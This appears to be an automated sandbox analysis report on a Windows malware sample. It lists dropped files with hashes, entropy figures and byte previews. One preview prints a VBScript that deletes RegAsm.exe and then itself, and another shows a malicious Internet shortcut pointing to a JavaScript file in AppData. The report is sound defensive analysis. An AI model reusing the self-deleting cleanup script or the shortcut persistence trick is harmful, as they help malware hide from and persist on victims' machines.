                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8............@.......................... ............@.................................4........@.. ...........f...h(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc... ....@......................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXE
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):14464
                                                                                                                                                                                        Entropy (8bit):7.986952593772248
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:X6Cy2+hwP/blC4U34l2iHAxlHqfHUEjAg7tMn:K52tls4ldHGlHqfHUEx7tE
                                                                                                                                                                                        MD5:A6D6C60FD822110BE81938B5A83B9533
                                                                                                                                                                                        SHA1:5C6E5FB2F1EC160731F29757D7510A78190D1B21
                                                                                                                                                                                        SHA-256:D11304A432FBD7FF5D1E44778D5BD348360EE46B00240049284F95276BDD47DF
                                                                                                                                                                                        SHA-512:E46A75DE38B77AF796E90426E89E8E5D697D7CAD8F309F7067752C7B7341D81C0BB65FF1BBABE71026FAFCDAEDCD4ED29C0F5CEEF086305F1B8C771BB6A189E5
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:'<.#.z.....?._..*..Aaa.v...^.5.<.]..c.{`.*V.j.-.V]...'>..A.q.p$..".AT..B.>?...)..P...`r.....9.x.'P7..l.fY.,o..f....Ps...)9;.I .?.y.Z...8-........u.D...t......eq.....^....gex..W..\.1.....l.._.{..u..=....}".8..."7.A..g.Pw....-....k..n.s.7;.NaN}....w..FE3....,..b.x.7.......B..L....X8.o.....G..........y...#..........~.........lz6CR..Can,rm.k...a.. ..^.4...a.. .i..P....@..)$.R.%.....~...8...^...Sq.n....~QW.1..J.RX^...6k..[!...B..S......~5.O..+.P71...8...U-..Uy.>..e.....l..!!..$.1...RY\...Un.e..6Q..s.K...Q...-.....2Oe*E3...J.;..j.F.~.J..!..V j.A.p.Ai....*...Z..%..z. ..SF~..........4...3f...MS........t+...|-.}...X,..5.'9m...$.7....8...........@..H.X<.p.......j.+.$^^*D#..V.1.(.....].T.:3.`B.@p~%,X...J.HL.....D.+..2.}.f.2P..1.p.G..?..).......o.V\M?6*...]..2.....&D.h......;...H..J.. ....00z..E.S;..~.h...k.0.lx.K..>.`..r...N..ta.Y..q.V..../..&.....".+1..hP5JC.s...j....s.3.0.(F.5wv.u6|aZ`.1.1m.l.".j&.tS....g..........q..*.......o..n.W..'.G....?<.".o.b.]...k
                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXE
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):76800
                                                                                                                                                                                        Entropy (8bit):7.99739880922186
                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                        SSDEEP:1536:Owl8CPetPt43hCzBQajnyC5dPXHG6u3NR8USGvFxsQzcw:hldxR+qajnTXHdudWU5UQzcw
                                                                                                                                                                                        MD5:359570710D9793AA98E354BCBF386A38
                                                                                                                                                                                        SHA1:7B44DDE782D9276654EF05E67A1DAB5FA4310E85
                                                                                                                                                                                        SHA-256:7146161B192A851540672D31B69B91F6D732CEE8777EBBE6246798A4838D07E2
                                                                                                                                                                                        SHA-512:8EC53F429A6EC12057A517CB32371E6E921A0FB10DB2C462870C9BDFF605B1247B07E2B29C199CB189F88C2BAAACA7DA0E427EB4CCF441B414FD0C64FD174C49
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:r..wr..+.e...-.~...{.+..".N.s..U|._.P,.0..p..a.T...L.>%.....>..p..8^.J.f.l...I...<&c..+$L...y...k@.K.....7.....A..8....:.1.......c.CF...";K.-7.;HCv.....=16.7|o...n......j..M..<]h.I..........[w....Vqh.....v..3s?...S.R..'\.]r..P.............Hf..|<...nJ..%..A&.Bp|Y$.L.I7.V%.}.......w...,.lO.....L/.n...$xs.{..S.Sdu...).....dI.Mi....1`~zH..!..X2.V,....Dt@-Mj..~."....D...H\...}...9..J;..21.9.%c.in_.....We...\.`..q....SN....`..g.|..&)...}.N.a...y.d.....\>.H.].......Z^...5.yp.6..d.?.."...d. .t.nJ...........:u\uK.]..o.........."^.)..i..wR.,.. .t88.'"m.7(J..%..9._WV.e.RgH.O.....wZ..7.Q.A...-.(..5.r.d...e..EP.M.+...e$73...'....Q..WKw. ..V...a.../...,...>'.vl...o.g.y.~y.d2....0....*../(....b.........5L*.#7y_OE...E#.xQm.........9..h.....3`m..'$....~d,.xK'.]..~T...HIg..l`9]NeW.w'.-...+.jI._.....8..E2....r)....}a&Q.....&....{5.c....R...&.....E...<..,.p.2S.G...l....u..5..(.....B.....q..U../..-...u...U.G~-.E...s.T`.)..S.Z.._O..%.%.5.."*a..P.
                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXE
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):81920
                                                                                                                                                                                        Entropy (8bit):7.997775144663306
                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                        SSDEEP:1536:A0rPOCdJwvkwyFf/rj1k7U9R8BVLvTvyo9l5BzGXa1c7CQK8Sxwx4eR4:A0rWCdqM3XH10myBVLvTvflHzGCcuQK3
                                                                                                                                                                                        MD5:C42FCC17904FA666D76265B8A45B7734
                                                                                                                                                                                        SHA1:368ACD51BD62BEEDB4CBDDF7142473D5A873484D
                                                                                                                                                                                        SHA-256:05FB815535624E6FDEBD1D3FD3C41E5E056C368A7CA57E2D681B7E91AAA6A44E
                                                                                                                                                                                        SHA-512:900C1F3FC85A96FF9384F8A15DF264AEC456A54841108E27F347797AFD25031922DB535A2749D1B627E28AEA5206BFA7960BB1CA72820EB49B19E3543401B2DB
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:......[m....?.z.C/.....{. ......I....1.....n.a.1..`.R...........O...5.sR./{%.J.r..U............e.\t.p.ctf........mH...9).....F.`..+>........;./.d.g....R....p....Z..b....R..*q.8c...7z.!......vI...:...J.=."..48.E.......q^..u.....M.?.$|...'S.T..'m........[......Y......u.`=X.....8%._....O...B..S*..H.....x..'....h+5......}m*@h]-.d.$.,.R4..|.......-....cn.Y.S.3.[!..e.e..`.`...5.f...z......$,e/e....T.e.>.e./.L.yp...+...._.DOc..,..T.].s...p!...i.2......_,.m.L~.Y....p...b.8. .TX"....:...G...)..E.oO_.P...O.g......t.C......Ay.K..R P.[p.KK9.....T.Lif.....h..x?.;m..Zx.VL..~M.5..|....f.Y...v..2...t..z..U_fX0.9H.....>.I.4..J..lV...^..!...|5..]Z..c...7].....^....3.=...T^XF|...X..K?....U.....E.....0..._"......R(:..c.......=k..B.tP.1..RP:I=U..Q..lZ{\.%...d.*-.v3W..3.rG......i!..z./.P.i*..X...$...../.@..,5#...3.J-w...|"gk...>.6 C{..d..#......e.U..[...K...aQ{.>..F...R.#.%+GE...h..?.....{.2...5\M...q.Y[.ag..R.9..;.p..IL]w.s~...x7o...R...o'Ns.z.5{..L.
                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXE
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):95232
                                                                                                                                                                                        Entropy (8bit):7.9978920596618375
                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                        SSDEEP:1536:GTwO5moNqUdiCD/xtLJs0+d0xUsxLxeL+Gmv3BqAXXMRnKIVL4H0IToM5Ze2NVhB:N4moEKiCzxt9FrjO4BqqXM9pVL4H0IT7
                                                                                                                                                                                        MD5:1885ADF09ACFA4B8818BF8153786CBC3
                                                                                                                                                                                        SHA1:48B1C38C8712F683E722CBC1F7977A6B3F4E3B7D
                                                                                                                                                                                        SHA-256:3EA7CEE5A287A1F5A6923CCF717025658C0476968DF6B6D5A1783A8B9F4DDE74
                                                                                                                                                                                        SHA-512:83D007312CCAAC1E17D74FEBA18149F351E135F1C972BBA62157E273863EECD566479C62D103048BBA1EB6AFEBEBE1EBA4C018FFB7F2DD7DA12DBB9455215E42
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:`.12B<.\a.pH.....n.^\...y..[.#.;...#.1..kD...Zw..P.g!/1pmE>....jX...m.pq.t...W...u..!....~...r...b....g.)i..=rp..xz.W0....r..3........)...2..SK.\.Y..+....Vi...#'.f..*3..N...^#...nfQ3e..t......Z.X..v3.I.M...K..H8..4.1...b....h.....z..G.......................k<.o0T...@.x....&...K..2...,....F..#.G..'...;.....,."e..M'4&.R.`!..U..x...o0......9........8.........D...~.............%..CQ.#....K...@.....m._.O.E. ...4.h...=..d]L^.4..x...>....E.~s.......Jd.>..e...0BI.S..m....g..z...c.......Z....-...D...x....*.t.`.:+.$G...!J.....3....@ .G.B>......J.H./....]....Iy....R.>.......#...%...,?......9..7|.{3..$..2...yy..].~......vA.......F..3....d:...y...O....m ..?.}..l.....&...&...^R..-,...#.<G..4.zL>...wk. .bR......RiQP.H.\...Z-(~R.l..Z.G.-N5.o.d.Yt4O.y.,.fi....;.8.....)p...MCH..dL.|.....A._q.B4..|.,Z@y.L.q.3...KL....R.-4..W...7,r..p..F{......^).{.\.....j.~........(.zg%...Y.....+.)......<ia.h.T+r.0...........J....|...f7^....w..z.W.Dw.~..>R..
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0155ffb7, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):15728640
                                                                                                                                                                                        Entropy (8bit):0.10807997132117475
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:GSB2jpSB2jFSjlK/gw/ZweshzbOlqVqww/ZXesozbElqVqgesKzbdzb+zb6:Ga6amUueqaJEeqv7tW
                                                                                                                                                                                        MD5:40D660B4AE3EF5A4D0EDCE7216A746FD
                                                                                                                                                                                        SHA1:4725EF64323F955EFE529DA3EE8F7DC0EA1E8626
                                                                                                                                                                                        SHA-256:D264158F0DB89FF6E751CF3697F21AD1B462A3866A737B0836194672AE24B67A
                                                                                                                                                                                        SHA-512:91044A1F5380FB982FAE2ACA51AF917C239E6A1D04798E3262037B5670EA37DBB7A7C5AA4197C8A7C7514790EE465B3183504A152F501F37729617DE898F8E22
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.U..... ...................':...{........................L..........{#. ....{M.h.N.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{..................................Jc|. ....{M.................... ....{M..........................#......h.N.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):544
                                                                                                                                                                                        Entropy (8bit):3.5805350668864047
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:12:xQ4lA2++ugypjBQMPURc+gxoIaj84Q3D9+gxoIaj849Hz/0aimi:7a2+SDq+gjeQT9+gje9Aait
                                                                                                                                                                                        MD5:4196262905F64F1DD00381F882D1E2C4
                                                                                                                                                                                        SHA1:325434EDD2F6930F987DE42E51228CA348745413
                                                                                                                                                                                        SHA-256:0B3CBDE8778E4F47322CA017B5280F6EED3CD6F327B436EEA4E91FBEB364A092
                                                                                                                                                                                        SHA-512:C3367AC15A473485ACEAFBE52AA591E33FB67DFF21896B936173DB78D2889F9EE200CE4B7D78EDE67BC471433444DEA1C4CB36013CDA7F6F9F7DF3416BB1AA73
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...w.h.i.l.e. .f.s.o...F.i.l.e.E.x.i.s.t.s.(.".C.:.\.W.i.n.d.o.w.s.\.M.i.c.r.o.s.o.f.t...N.E.T.\.F.r.a.m.e.w.o.r.k.\.v.4...0...3.0.3.1.9.\.R.e.g.A.s.m...e.x.e.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.W.i.n.d.o.w.s.\.M.i.c.r.o.s.o.f.t...N.E.T.\.F.r.a.m.e.w.o.r.k.\.v.4...0...3.0.3.1.9.\.R.e.g.A.s.m...e.x.e."...w.e.n.d...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).
                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:Qn:Qn
                                                                                                                                                                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:..
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.js" >), ASCII text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):95
                                                                                                                                                                                        Entropy (8bit):4.690305700235914
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:HRAbABGQaFyw3pYoqLTVSRE2J5hABMD5qLK1tF:HRYF5yjoqLTwi23pDY+N
                                                                                                                                                                                        MD5:58F7454E8631EED5910878538D064B06
                                                                                                                                                                                        SHA1:F2CED594FE6D43396F22ECF9D51BB9A3B16221AA
                                                                                                                                                                                        SHA-256:CE7655A86F40467559BE769546442D624EFAFA0DB0A90D926D611135B7975FC3
                                                                                                                                                                                        SHA-512:85191526849C5B475176D91C301F2B422B162AC34EF0E40E1DFC53956A654061B32507B72A3780445B4034FBBA1F6810382BDE46138E6CD049AFCA4DCEECE986
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.js" ..
                                                                                                                                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                        Entropy (8bit):6.859708005492781
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                        File name:6706e721f2c06.exe
                                                                                                                                                                                        File size:164'352 bytes
                                                                                                                                                                                        MD5:9d26cee91cd86b11808a161681be9f85
                                                                                                                                                                                        SHA1:f0334a5e2d01bbaf5bdb4a103bf9504dad218f85
                                                                                                                                                                                        SHA256:c3dee07cba853e66489d883ef5bcc094ea32861828ebfcde773e7527726be35c
                                                                                                                                                                                        SHA512:c18981b4b41faa942159c12a27b8ef6bcf16905b160cbe59b92823b52eabfeb698d1f44614bfc03162926d044681a1be54aa24bd13b3624f05d9c0cd0ee0f3d4
                                                                                                                                                                                        SSDEEP:3072:1ahKyd2n31D5GWp1icKAArDZz4N9GhbkrNEk18HzvT:1ahObp0yN90QEV
                                                                                                                                                                                        TLSH:11F38D0A63E420A6E4BA577498F602935A317CB16B7886FF22C5D57E0E337D0A532F17
                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."
                                                                                                                                                                                        Icon Hash:3b6120282c4c5a1f
                                                                                                                                                                                        Entrypoint:0x140008200
                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                        Digitally signed:false
